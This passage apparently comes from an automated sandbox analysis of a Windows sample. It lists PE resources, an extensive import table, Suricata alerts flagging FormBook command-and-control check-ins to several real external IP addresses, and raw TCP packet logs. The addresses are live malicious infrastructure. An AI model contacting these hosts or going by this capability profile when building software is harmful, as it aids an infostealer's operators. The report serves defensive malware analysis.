                    RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                    RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                    RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                    RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                    RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                    RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                    RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                    RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                    RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                    RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                    RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                    RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                    RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                    RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                    RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                    RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                    RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                    RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                    Imports

                    DLLImport
                    WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                    VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                    COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                    MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                    PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                    USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                    KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                    USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                    GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                    COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                    ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                    SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                    ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                    OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishGreat Britain
                    EnglishUnited States

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-09-22T17:39:57.205741+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44973634.150.58.7380TCP
                    2024-09-22T17:39:57.205741+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44973634.150.58.7380TCP
                    2024-09-22T17:40:21.659147+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449738195.24.68.2580TCP
                    2024-09-22T17:40:24.215429+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449739195.24.68.2580TCP
                    2024-09-22T17:40:26.891623+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449740195.24.68.2580TCP
                    2024-09-22T17:40:29.297393+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449741195.24.68.2580TCP
                    2024-09-22T17:40:29.297393+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449741195.24.68.2580TCP
                    2024-09-22T17:40:35.188295+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449742162.0.213.9480TCP
                    2024-09-22T17:40:37.650196+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449743162.0.213.9480TCP
                    2024-09-22T17:40:40.218478+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449744162.0.213.9480TCP
                    2024-09-22T17:40:42.733820+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449745162.0.213.9480TCP
                    2024-09-22T17:40:42.733820+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449745162.0.213.9480TCP
                    2024-09-22T17:40:49.472166+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449746154.23.184.24080TCP
                    2024-09-22T17:40:52.031569+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449747154.23.184.24080TCP
                    2024-09-22T17:40:54.630810+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449748154.23.184.24080TCP
                    2024-09-22T17:40:57.183412+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449749154.23.184.24080TCP
                    2024-09-22T17:40:57.183412+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449749154.23.184.24080TCP
                    2024-09-22T17:41:04.176557+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975047.104.180.13980TCP
                    2024-09-22T17:41:06.675895+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975147.104.180.13980TCP
                    2024-09-22T17:41:09.615190+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44975247.104.180.13980TCP
                    2024-09-22T17:41:11.894995+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44975347.104.180.13980TCP
                    2024-09-22T17:41:11.894995+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44975347.104.180.13980TCP
                    2024-09-22T17:41:25.537878+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497543.33.130.19080TCP
                    2024-09-22T17:41:28.093068+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497553.33.130.19080TCP
                    2024-09-22T17:41:30.632214+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497563.33.130.19080TCP
                    2024-09-22T17:41:33.166974+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497573.33.130.19080TCP
                    2024-09-22T17:41:33.166974+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497573.33.130.19080TCP
                    2024-09-22T17:41:46.924343+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449758199.59.243.22780TCP
                    2024-09-22T17:41:49.395064+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449759199.59.243.22780TCP
                    2024-09-22T17:41:52.520986+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449760199.59.243.22780TCP
                    2024-09-22T17:41:54.448144+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449761199.59.243.22780TCP
                    2024-09-22T17:41:54.448144+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449761199.59.243.22780TCP
                    2024-09-22T17:42:00.094039+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449762162.241.226.19080TCP
                    2024-09-22T17:42:02.976646+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449763162.241.226.19080TCP
                    2024-09-22T17:42:05.325691+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449764162.241.226.19080TCP
                    2024-09-22T17:42:07.804051+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449765162.241.226.19080TCP
                    2024-09-22T17:42:07.804051+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449765162.241.226.19080TCP
                    2024-09-22T17:42:14.195272+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976691.215.85.2380TCP
                    2024-09-22T17:42:16.718948+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976791.215.85.2380TCP
                    2024-09-22T17:42:19.288646+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44976891.215.85.2380TCP
                    2024-09-22T17:42:21.791909+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44976991.215.85.2380TCP
                    2024-09-22T17:42:21.791909+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44976991.215.85.2380TCP
                    2024-09-22T17:42:27.767760+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977084.32.84.3280TCP
                    2024-09-22T17:42:30.297965+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977184.32.84.3280TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 22, 2024 17:39:56.257118940 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:56.263520002 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:56.263766050 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:56.272306919 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:56.279567957 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.205507040 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.205532074 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.205547094 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.205560923 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.205574036 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.205589056 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.205740929 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.205801010 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.206554890 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.206614017 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.206624985 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.206713915 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.207211971 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.207257986 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.211489916 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.211503029 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.211513996 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.211575985 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.212199926 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.212316036 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.411236048 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.411272049 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.411281109 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.411292076 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.411676884 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.416203976 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416217089 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416227102 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416238070 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416249037 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416260958 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416270018 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416279078 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416290045 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416299105 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.416300058 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416311026 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416322947 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416331053 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416342020 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416352987 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416363001 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416373014 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416385889 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416388035 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.416399002 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416439056 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.416548014 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416599035 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416610003 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416616917 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.416659117 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.416927099 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416938066 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.416996002 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.616928101 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617007017 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617017031 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617027044 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617038965 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617049932 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617057085 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617130041 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617142916 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617224932 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.617280960 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.617285013 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617311001 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617357016 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.617922068 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617971897 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.617974997 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.617986917 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.618031979 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.618465900 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.618475914 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.618486881 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:39:57.618520975 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.618545055 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.624500036 CEST4973680192.168.2.434.150.58.73
                    Sep 22, 2024 17:39:57.629287004 CEST804973634.150.58.73192.168.2.4
                    Sep 22, 2024 17:40:20.928080082 CEST4973880192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:20.933031082 CEST8049738195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:20.933108091 CEST4973880192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:20.944772959 CEST4973880192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:20.949716091 CEST8049738195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:21.658854008 CEST8049738195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:21.658977032 CEST8049738195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:21.659147024 CEST4973880192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:22.458956003 CEST4973880192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:23.478766918 CEST4973980192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:23.483808041 CEST8049739195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:23.483937025 CEST4973980192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:23.504281044 CEST4973980192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:23.509099960 CEST8049739195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:24.215229034 CEST8049739195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:24.215361118 CEST8049739195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:24.215429068 CEST4973980192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:25.005990028 CEST4973980192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:26.024908066 CEST4974080192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:26.030000925 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.030143023 CEST4974080192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:26.042485952 CEST4974080192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:26.048804045 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.048835993 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.048868895 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.048897982 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.048928022 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.049154043 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.049251080 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.049279928 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.049314022 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.891362906 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.891398907 CEST8049740195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:26.891623020 CEST4974080192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:27.552839994 CEST4974080192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:28.572639942 CEST4974180192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:28.577709913 CEST8049741195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:28.577852964 CEST4974180192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:28.588864088 CEST4974180192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:28.593667984 CEST8049741195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:29.297085047 CEST8049741195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:29.297291994 CEST8049741195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:29.297393084 CEST4974180192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:29.353636980 CEST4974180192.168.2.4195.24.68.25
                    Sep 22, 2024 17:40:29.360250950 CEST8049741195.24.68.25192.168.2.4
                    Sep 22, 2024 17:40:34.491895914 CEST4974280192.168.2.4162.0.213.94
                    Sep 22, 2024 17:40:34.496817112 CEST8049742162.0.213.94192.168.2.4
                    Sep 22, 2024 17:40:34.496958971 CEST4974280192.168.2.4162.0.213.94
                    Sep 22, 2024 17:40:34.508917093 CEST4974280192.168.2.4162.0.213.94
                    Sep 22, 2024 17:40:34.513864994 CEST8049742162.0.213.94192.168.2.4
                    Sep 22, 2024 17:40:35.188148022 CEST8049742162.0.213.94192.168.2.4
                    Sep 22, 2024 17:40:35.188220978 CEST8049742162.0.213.94192.168.2.4
                    Sep 22, 2024 17:40:35.188256979 CEST8049742162.0.213.94192.168.2.4
                    Sep 22, 2024 17:40:35.188291073 CEST8049742162.0.213.94192.168.2.4
                    Sep 22, 2024 17:40:35.188294888 CEST4974280192.168.2.4162.0.213.94
                    Sep 22, 2024 17:40:35.188328028 CEST8049742162.0.213.94192.168.2.4
                    Sep 22, 2024 17:40:35.188338041 CEST4974280192.168.2.4162.0.213.94
                    Sep 22, 2024 17:40:35.188364029 CEST8049742162.0.213.94192.168.2.4
                    Sep 22, 2024 17:40:35.188397884 CEST8049742162.0.213.94192.168.2.4
